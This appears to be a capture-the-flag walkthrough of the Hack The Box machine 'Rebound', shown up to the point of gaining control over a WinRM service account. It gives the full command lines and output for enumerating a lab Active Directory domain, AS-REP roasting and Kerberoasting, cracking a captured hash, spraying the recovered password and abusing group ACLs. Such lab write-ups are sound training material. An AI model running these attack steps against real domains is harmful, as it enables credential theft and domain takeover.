Rebound is a hard Active Directory / Kerberos box.
I’ll start off with a RID-cycle attack to get a list of users, and combine AS-REP-Roasting with Kerberoasting to get an crackable hash for a service account.
That password is shared by a domain user, and I’ll find a bad ACL that allows that user control over an important group. With access to that group, I can change the password of or get a shadow credential for another user with WinRM access.
I’ll perform a cross-session relay attack with both RemotePotato and KrbRelay to get a hash for the next user, who can read the GMSA password for another service account. This account has a constrained delegation, and I’ll need to abuse both that delegation as well as RBCD to get a ticket as the DC machine account, and dump hashes for the domain. This one is heavy into Active Directory and Kerberos!
HTB Rebound
nmap
nmap -p- --min-rate 10000 10.10.11.231 Starting Nmap 7.93 ( https://nmap.org ) at 2024-12-06 09:07 CET Nmap scan report for 10.10.11.231 Host is up (0.013s latency). Not shown: 65509 closed tcp ports (conn-refused) PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 9389/tcp open adws 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49673/tcp open unknown 49690/tcp open unknown 49691/tcp open unknown 49692/tcp open unknown 49697/tcp open unknown 49718/tcp open unknown 49727/tcp open unknown 49800/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 7.29 seconds
.
nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sV -o rebound.nmap 10.10.11.231 Nmap scan report for 10.10.11.231 Host is up (0.015s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-06 15:11:07Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name) 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Dec 6 09:11:46 2024 -- 1 IP address (1 host up) scanned in 45.46 seconds
.
This is a Windows Domain Controller.
I will add the hosts to my /etc/hosts file:
10.10.11.231 dc01 rebound.htb dc01.rebound.htb
Having dc01 in there will prove important later.
SMB – TCP 445
Host Enumeration
netexec shows the same thing as the nmap output:
nxc smb 10.10.11.231 SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
Shares
The guest user is able to list shares:
nxc smb 10.10.11.231 -u guest -p '' --shares SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False) SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest: SMB 10.10.11.231 445 DC01 [*] Enumerated shares SMB 10.10.11.231 445 DC01 Share Permissions Remark SMB 10.10.11.231 445 DC01 ----- ----------- ------ SMB 10.10.11.231 445 DC01 ADMIN$ Remote Admin SMB 10.10.11.231 445 DC01 C$ Default share SMB 10.10.11.231 445 DC01 IPC$ READ Remote IPC SMB 10.10.11.231 445 DC01 NETLOGON Logon server share SMB 10.10.11.231 445 DC01 Shared READ SMB 10.10.11.231 445 DC01 SYSVOL Logon server share
.
oxdf@hacky$ netexec smb 10.10.11.231 -u guest -p '' --shares
SMB 10.10.11.231 445 DC01 Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest:
SMB 10.10.11.231 445 DC01 Enumerated shares
SMB 10.10.11.231 445 DC01 Share Permissions Remark
SMB 10.10.11.231 445 DC01 ----- ----------- ------
SMB 10.10.11.231 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.231 445 DC01 C$ Default share
SMB 10.10.11.231 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.231 445 DC01 NETLOGON Logon server share
SMB 10.10.11.231 445 DC01 Shared READ
SMB 10.10.11.231 445 DC01 SYSVOL Logon server share
These are the standard shares on a DC, plus Shared.
There are no files found that can be accessed with a null auth.
User Enumeration
I’ll perform a RID Cycling attack to enumerate users:
nxc smb 10.10.11.231 -u guest -p '' --rid-brute SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False) SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest: SMB 10.10.11.231 445 DC01 498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.231 445 DC01 500: rebound\Administrator (SidTypeUser) --snip-- SMB 10.10.11.231 445 DC01 3382: rebound\fflock (SidTypeUser)
By default, typical RID cycle attacks go up to RID 4000. For a larger domain, it may be necessary to expand that, so I’ll switch to lookupsid.py (though netexec works as well by adding the max number to the option like --rid-brute 10000). Trying 10,000 does find more users (I don’t find any above 8,000):
impacket-lookupsid -no-pass 'guest@rebound.htb' 20000 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Brute forcing SIDs at rebound.htb [*] StringBinding ncacn_np:rebound.htb[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209 498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup) 500: rebound\Administrator (SidTypeUser) --snip-- 7687: rebound\delegator$ (SidTypeUser)
I’ll run that again to make a users list:
impacket-lookupsid -no-pass 'guest@rebound.htb' 8000 | grep SidTypeUser | cut -d' ' -f2 | cut -d'\' -f2 | tee users Administrator Guest krbtgt DC01$ ppaul llune fflock jjones mmalone nnoon ldap_monitor oorend winrm_svc batch_runner tbrady delegator$
Auth as ldap_monitor
AS-Rep-Roast
Without creds, I can look for users that have the DONT_REQUIRE_PREAUTH flag set using the Impacket script GetNPUsers.py. It finds one:
impacket-GetNPUsers -usersfile users rebound.htb/ -dc-ip 10.10.11.231 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User llune doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User fflock doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$jjones@REBOUND.HTB:0628fadfb01a85aa9180ab2109a1cfac$9a123a09e093d37762a7ef5ae825c0cab83ded5ce7e37c1799d4d8c2ef703666ec462a3bd2abed5e922b2eedb3f1bf9c1132650a3b5f71bee26034beca795a9099d8b883f359b140ef9f36d857a45221704e6204ba88f308301a75b1ece4b9078a75551295af41817b629dfe567302acc848aada6885ff7a810861fd7243f95f89fefa22b993b41aa74b0d95ec733752ea688cb03a34449cbab40a024c9a396546b987f4a933de2e2f0a33c53a6cad43db2734ec4707db82b63aae1c78e1feaa38c476c861b5edb50ee31a9a1359af411c4b618d36c90ecd444b6c4d976bc7980eb169b9a6b94a404ccc [-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User nnoon doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User ldap_monitor doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User oorend doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User winrm_svc doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User batch_runner doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User delegator$ doesn't have UF_DONT_REQUIRE_PREAUTH set
netexec can do this as well:
nxc ldap 10.10.11.231 -u users -p '' --asreproast asrephashes.txt SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) LDAP 10.10.11.231 445 DC01 $krb5asrep$23$jjones@REBOUND.HTB:e92d3f8cccf553687653d4266eba36e1$6bc95311e1d5a6a0d28868a810802414fc82c4f39fde09db6a9a0190e88ae1026bec5a84551158ede8acb5ded440b32e7949afb18a45b3d8fbbcf29d280968a87e154ff24739cf436c5ae47c14046f8bc6febe42f0a698f27b045c21ecbe63b695237e8436b6a1a8f97e3a104ff65d9116c35db72ac7c7b596e84afd9ff11b8bd994f08715345a5fe4073551935a4311c1fc2baaa5009270fc7de701d0e09de7c4069f30964ceec1bc7ae465bce006c31b78b3d7304703811b93daf2751325d3444fce48eca4e0315d483507ae2d1a9bb4e8831d840b9f37bf8485a543b22aab0dee46a658d2aec09988
It saves the hashes to the specified output file, in this case, asprephashes.txt.
I’ll take this over to hashcat and try to crack it, but it doesn’t crack on rockyou.txt, which means it’s likely not meant to be cracked.
Kerberoast
Strategy
Typically I think of Kerberoasting as something I can do once I have at least one domain user’s creds. But this research from Charlie Clark in Sept 2022 showed that it is possible to abuse a user with DONT_REQUIRE_PREAUTH to Kerberoast other users. The post summarizes:
Therefore, if any account is configured to not require pre-authentication, it is possible to Kerberoast without any credentials. This method of Kerberoasting has been implemented in Rubeus within this PR.
It’s also implemented in GetUserSPNs.py from this commit, though I had to install it from GitHub rather than PyPI to get it working (pipx install git+https://github.com/fortra/impacket).
Get Hashes
To Kerberoast this way (ASPERKerberoast?), I’ll use the -no-preauth flag, giving it the account that does not require preauth, jjones, as well as the -usersfile, the -dc-host, and the domain:
impacket-GetUserSPNs -no-preauth jjones -usersfile users -dc-host 10.10.11.231 rebound.htb/ Impacket v0.12.0.dev1 - Copyright 2023 Fortra [-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) $krb5tgs$18$krbtgt$REBOUND.HTB$*krbtgt*$27--smip--45 $krb5tgs$18$DC01$$REBOUND.HTB$*DC01$*$16--snip--c3 [-] Principal: ppaul - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: llune - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: fflock - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: jjones - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: mmalone - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: nnoon - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) $krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$61227a1eab1fc7fa459a3fce20ede19f$680e824c38e8edb372d5189bc2c923a4fb3512aad430b7669fd21a043068d4d30f092a84a63ebcfde6d29cbf809efe2ab28fbff925ff7839e878f55c01bad80be8a3367621541c56640a065089248e21656cd16235e932d903b305d42a872e185e283d27113e53f24738488e6f323eab5e0d177dff2f343dac12cbdf6fa0d7ec855bd5761f364b4efdb985081319c7f03898670e97cdc86ee422a984aa1179b6c2776c95edc4469e8f6324fcb72407e8f7b4a25e4677f07dc29a1fe6684777c467839d3ccd80943e128ee509daa23f3c9ddabee9c3e697dc870adb4c3bf30b1dfa7f4f722fb3df0f95f88c9ab47d24c438ae4f1849a3c75462789321749477ef2480ba3f4846304b4298e84fabc092dfebecb23188cfb71ff49cd7ff05b6e6e2662c819f92d2b42cea96dc3b811267eed7c905eac82a1b3dc0e9c6da05870556aa346758eb199582fc060f7a52c9688ed1c43fc164d5ef3c70976cf15dd65d7624e05afa89f55d86df4858218ad798a320260e6ba8343d98edfb7b1759bc8eef999967aa012c95d95781f2df9f3ddb1965463f820f63b6e47ae2671a01ff9d0d7fd2611a072d88bfd3301e3e5a12e1884df725e857d66e8b37b0dc5948dea1d34ff56f510328815b7842a6e3f3bb1033fc21d6b38ff2ae1a7f8474faa759bf2afa7ae9a49a072c2f72d338b4723a8c8041e264b43994b7e05cf0bba867e3cb24c7356c88a256cc49bd0b504681d29aa14ea825cd2cb4d6da37113a2d7ef4894ef130468cf85ae6f1d0d40a271a63198f1450854f9169f253dde33f16a3fcebb37ae3796e639bb2ed8d75b8600f442df9adba6c2fbfbaa4adf7370691bb2d4acaf1935e010f5d49ebe9c470325e7f6a90caf3000c995a0d4e1d83a411929dd3cbd10344acbea1cded46c499c38a8ec763e78872a8a9c7eb9bff919c33d3e92688aed2fb25a37f9db57d32662e718fc4089230694a6370628cd45c59513c82f969bf52653536a61fad0d9c08ce431a262e228c76ab8a0d2a7f4152e503aa9ea4d1bc80e720a3e806c4e023cd92309f0b8af1d82fa3ad6eaa5fd334ece0643d9f3c01e482403ce226cec78df10a04922bb290ad1a6490c348b728bd3e2c3d84beadb36ea8f87e639fd100b9d9021a28aaf046df6ecc69071a598a76e405a08bf9abe99684f55c3b40a27e3c526c6a395a8d8a0936a8b3df624d8d517cb73cfb5e23a381b42615f83e6a758ba9860d93f25057ac7b594ca2858c63a31cc90e3cdc7e16bd4c148a507cc0270abe9ad342158bdcc573fdb572a0645cb362b841805935b115bbe617b9dbb3518f68b17678e684f10699421202d38854bab0d85c382757802f [-] Principal: oorend - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: winrm_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: batch_runner - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: tbrady - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) $krb5tgs$18$delegator$$REBOUND.HTB$*delegator$*$b8fca731837081c3f01bf293$56b9c621bce20848a34591f883b10e6e346810f06bf8ccee7e30a6434a59368527c6e7ed84bf65b18798ea1fad6607be106a7d33cdb974134950ffd0cc4dac3d7582eb1152f010c8adbb581d5ff68e75bc3e06a6a9bb8010cec53026c6c12ac31a7e3f35fa19653f28c05452ac673929b596127437a77f87ad59b72630ab5a749cb9be3e8a807e126885895830438ce85c83d3c137b3018080dff79c900d25bd76d80a914cb50914fe97963526fe4f6521492e6f3a00af3015a36c93c8713230a95beaccb7c0186353e4aab157635ac6dcdefc0f74a1a2ce24e3697d939ed42bd20eb1a6c24f67b57bfa36de7365ef1b33e612927a39cc27231f5fa9dd279a7ab1875717ad5d6775007ceb57c3ad81108c33c89045a2bf8a89da63e08b6e6584754118ade4350e7b52a06eeaf885f4e110e967afebe6a32c52133843bf82b8fe704a3ee9c42ba065d8c7372155fdf11c13acea76a61ba07b07816051e1e52f8d162ae7569424af4d55ab8f8fbb43f0b1bdbec830843b918a95c03198d5aeb09abf18bdbc911334dbac498bad2adffef2cb8ccd0d319c914e8fdf64377ce213ca5fe0b64def7f196bf485e00bb4309e5378b5db8e389eb231e1ae9982229c1457133f729767fdfac2518aa9945b729a50747797c996ff6063853df5b6ec75657e886166f75cb06e4ac1a69cccadc043f800c2e20bfce6034f27fb5cbda36b2055c9d1c8f579d48ed6edf71d305c8543f14106d71a5f44c5e901955c4cb54baeb1ef8ee2ce1fcd4dbe74584a88d2084f99053d30d2e79b51873c92fb6ffd85a2a52afb9a80c24cbf00f2509a90c3a5f532fe16d40b1ef61113b722c6d9a3480ffc869a159dc14927feeb8d290fd898c2dbd8310c7199d4ffab07ec7631d09d112f97707e6d8534df43a6bfc005011878a5e51c6c3148a746ac882aefab6aa8d81c589d81c1cd58ee93db4c28a0dfb66e2adca0b848cc1015a29d7d4a5deabbd67966a07176bdcf36bb4d8a6413f440330d4c058e8ec8811a30b525624627429af2255afc132c59c7d5449b26a01930e860c007f7efcbc1b3c5ecb7023a6dec97a4c9cd6030679839aaff95ba0205d6639e78930b71fa6285ab2bb9461781215e7d86e71b1790092bd54a0f1b1af174f3ed8deb77e57ba6682ac6a8fe196db901cd546e976d788566670b5d183ad01f30e5ec5a792d3f772cfdc0d1215ef1749296fb191265f41ee978db62d0fb5d8ef1667d281d6aa01037fd24e836b8643692c5365ba350d84ccc4581fe5bd67ef531da9a235f08ade830def47ba4833f646cc78cfa03d342d7857179c522192dde65c838ae8dd01009ac80362755c9e251031f7e800aece431be837cfd
It finds hashes for several accounts. I’ll save these to a file:
impacket-GetUserSPNs -no-preauth jjones -usersfile users -dc-host 10.10.11.231 rebound.htb/ | grep '^\$krb' > kerberoasting_hashes
Crack
Without trying, I think it will be very unlikely that the krbtgt, DC01$, or delegator$ accounts will crack. Those are all machine accounts or otherwise internally managed accounts, and likely to have a long complex password. I’ll start with ldap_monitor:
puck@hkali$ cat kerberoasting_hashes | grep ldap_monitor > ldap_monitor_hash
This hash cracks very quickly:
hashcat ldap_monitor_hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$3e--snip--d60:1GR8t@$$4u
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*...96cd60
The others don’t crack with rockyou.txt.
Test Creds
These creds work for SMB, but not LDAP:
nxc ldap rebound.htb -u ldap_monitor -p '1GR8t@$$4u' SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False) LDAPS 10.10.11.231 636 DC01 [-] rebound.htb\ldap_monitor:1GR8t@$$4u LDAPS 10.10.11.231 636 DC01 [-] LDAPS channel binding might be enabled, this is only supported with kerberos authentication. Try using '-k'.
The LDAP failure is weird. Typically, any domain use can at least connect to LDAP. It turns out that the host is configured with the LDAP Channel Binding Policy is set to Always, which is designed to prevent NTLM relay attacks (see this neat video).
If I try netexec against with the -k flag to force Kerberos, it does work:
netexec ldap rebound.htb -u ldap_monitor -p '1GR8t@$$4u' -k
SMB rebound.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAP rebound.htb 389 DC01 [-] rebound.htb\ldap_monitor:1GR8t@$$4u KRB_AP_ERR_SKEW
sudo ntpdate rebound.htb
2024-12-06 17:51:09.244487 (+0100) +25200.329485 +/- 0.009144 rebound.htb 10.10.11.231 s1 no-leap
CLOCK: time stepped by 25200.329485
netexec ldap rebound.htb -u ldap_monitor -p '1GR8t@$$4u' -k
SMB rebound.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS rebound.htb 636 DC01 [+] rebound.htb\ldap_monitor
At this point, with legit creds, there’s a lot I can collect, but I’ll save it for the next step when it’s most useful.
Auth as OOrend
Password Spray
Given that ldap_monitor seems like a shared account, I’ll check to see if the password is reused with any other users. I’ll need the --continue-on-success flag to keep going after verifying the password works for ldap_monitor:
nxc smb rebound.htb -u users -p '1GR8t@$$4u' --continue-on-success SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False) SMB 10.10.11.231 445 DC01 [-] rebound.htb\Administrator:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\Guest:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\krbtgt:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\DC01$:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\ppaul:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\llune:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\fflock:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\jjones:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\mmalone:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\nnoon:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap_monitor:1GR8t@$$4u SMB 10.10.11.231 445 DC01 [+] rebound.htb\oorend:1GR8t@$$4u SMB 10.10.11.231 445 DC01 [-] rebound.htb\winrm_svc:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\batch_runner:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\tbrady:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\delegator$:1GR8t@$$4u STATUS_LOGON_FAILURE
oorend uses the same password!
Validate Creds
Still no WinRM, and the same thing happens with LDAP:
xc ldap rebound.htb -u oorend -p '1GR8t@$$4u' -k
SMB rebound.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS rebound.htb 636 DC01 [+] rebound.htb\oorend
┌──(puck㉿kali)-[~/htb/rebound]
└─$ nxc winrm rebound.htb -u oorend -p '1GR8t@$$4u' -k
WINRM rebound.htb 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:rebound.htb)
Shell as WinRM_svc
Enumeration
Collect Bloodhound
With access to two users, I can pull Bloodhound data with either of them:
We tailor the collection query ( -c ) to exclude ObjectProps , as it seemingly causes bloodhound-python tool to fail.
bloodhound-python -u ldap_monitor -p '1GR8t@$$4u' -d rebound.htb -dc dc01.rebound.htb --zip -c Group,LocalAdmin,RDP,DCOM,Container,PSRemote,Session,Acl,Trusts,LoggedOn -ns 10.10.11.231 INFO: Found AD domain: rebound.htb INFO: Getting TGT for user INFO: Connecting to LDAP server: dc01.rebound.htb WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead... INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc01.rebound.htb WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead... INFO: Found 16 users INFO: Found 53 groups INFO: Found 2 gpos INFO: Found 2 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc01.rebound.htb INFO: User with SID S-1-5-21-4078382237-1492182817-2568127209-7686 is logged in on dc01.rebound.htb INFO: Done in 00M 07S INFO: Compressing output into 20241206181254_bloodhound.zip
.
Bloodhound Analysis
It turns out that the version of Bloodhound Python that was out when Rebound released didn’t collect the data necessary for the next step. I’ll show that version here, as well as the latest version at the end.
Bloodhound doesn’t show any kind of outbound control from either ldap_monitor or oorend. Typically this is where I move to other stuff, but without much else, I’ll look around what what interesting targets might be. The “Shortest Paths to High Value Targets” query shows this spegehitti:
Click for full size imageThe top right of the chart jumps out as interesting. Two users in the ServiceMgmt group, which has GenericAll on Service Users, which contains WinRm_SVC. WinRm_SVC can also PsRemote into the DC, which is something I probably need.
ACL Analysis
powerview.py is a neat tool for doing deeper analysis of Windows object properties remotely. Based off the no-longer-maintained powerview.ps1 (still available here).
Without -k, it won’t connect (just like above), but on adding it, it does:
but i used a python virtual Environment
python3 -m venv venv
source venv/bin/activate
git clone https://github.com/aniqfakhrul/powerview.py
cd powerview.py
┌──(venv)─(puck㉿kali)-[~/htb/rebound/powerview.py]
└─$ sudo apt install libkrb5-dev
└─$ bash install.sh
┌──(venv)─(puck㉿kali)-[~/htb/rebound/powerview.py]
└─$ powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb
Logging directory is set to /home/puck/.powerview/logs/rebound-oorend-rebound.htb
[2024-12-06 18:26:33] Channel binding is enforced!
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV >
From the PV > prompt, I can run typical PowerView commands. When I get to looking at the ACL on the RemoteMGMT group, there’s an interesting entry:
powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb Logging directory is set to /home/puck/.powerview/logs/rebound-oorend-rebound.htb [2024-12-06 18:26:33] Channel binding is enforced! (LDAPS)-[dc01.rebound.htb]-[rebound\oorend] PV > Get-DomainObjectAcl -Identity ServiceMGMT ObjectDN : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7683 ACEType : ACCESS_ALLOWED_OBJECT_ACE ACEFlags : None AccessMask : ReadProperty ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT ObjectAceType : 46a9b11d-60ae-405a-b7e8-ff8a58d456d2 InheritanceType : None SecurityIdentifier : BUILTIN\Windows Authorization Access Group (S-1-5-32-560) ObjectDN : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7683 ACEType : ACCESS_ALLOWED_OBJECT_ACE ACEFlags : None AccessMask : ControlAccess ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT ObjectAceType : ab721a55-1e2f-11d0-9819-00aa0040529b InheritanceType : None SecurityIdentifier : Authenticated Users (S-1-5-11) ObjectDN : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7683 ACEType : ACCESS_ALLOWED_ACE ACEFlags : None ActiveDirectoryRights : Self AccessMask : 0x8 InheritanceType : None SecurityIdentifier : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682) --snip-- (LDAPS)-[dc01.rebound.htb]-[rebound\oorend] PV >
oorend has Self rights over this group, which means they can add themselves to it.
Get ServiceMGMT Group
I’ll add the oorend user to the ServiceMGMT using Powerview commands:
┌──(venv)─(puck㉿kali)-[~/htb/rebound/powerview.py] └─$ powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb Logging directory is set to /home/puck/.powerview/logs/rebound-oorend-rebound.htb [2024-12-06 18:41:55] Channel binding is enforced! (LDAPS)-[dc01.rebound.htb]-[rebound\oorend] PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend [2024-12-06 18:42:23] User oorend successfully added to servicemgmt (LDAPS)-[dc01.rebound.htb]-[rebound\oorend] PV >
This could also be done with bloodyAD, another tool I’ll use a lot on this box:
┌──(puck㉿kali)-[~/vulnlab/delegate/krbrelayx/bloodyAD] └─$ python3 bloodyAD.py -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add groupMember ServiceMGMT oorend [+] oorend added to ServiceMGMT
After running this (either way), oorend is now in the group:
Get Control over WinRM_SVC
With full control rights over the ServiceMGMT OU, I can give oorend GENERICALL over the users in the OU:
┌──(puck㉿kali)-[~/vulnlab/delegate/krbrelayx/bloodyAD] └─$ python3 bloodyAD.py -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend [+] oorend has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB
Now oorend has FullControl over WinRM_svc:
┌──(venv)─(puck㉿kali)-[~/htb/rebound/powerview.py] └─$ powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb Logging directory is set to /home/puck/.powerview/logs/rebound-oorend-rebound.htb [2024-12-06 18:41:55] Channel binding is enforced! (LDAPS)-[dc01.rebound.htb]-[rebound\oorend] PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend [2024-12-06 18:42:23] User oorend successfully added to servicemgmt (LDAPS)-[dc01.rebound.htb]-[rebound\oorend] PV > Get-DomainObjectAcl -Identity winrm_svc -Where "SecurityIdentifier contains oorend" (LDAPS)-[dc01.rebound.htb]-[rebound\oorend] PV > Get-DomainObjectAcl -Identity winrm_svc -Where "SecurityIdentifier contains oorend" ObjectDN : CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7684 ACEType : ACCESS_ALLOWED_ACE ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE, OBJECT_INHERIT_ACE ActiveDirectoryRights : FullControl AccessMask : 0xf01ff InheritanceType : None SecurityIdentifier : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682) (LDAPS)-[dc01.rebound.htb]-[rebound\oorend] PV >
Access WinRM_SVC
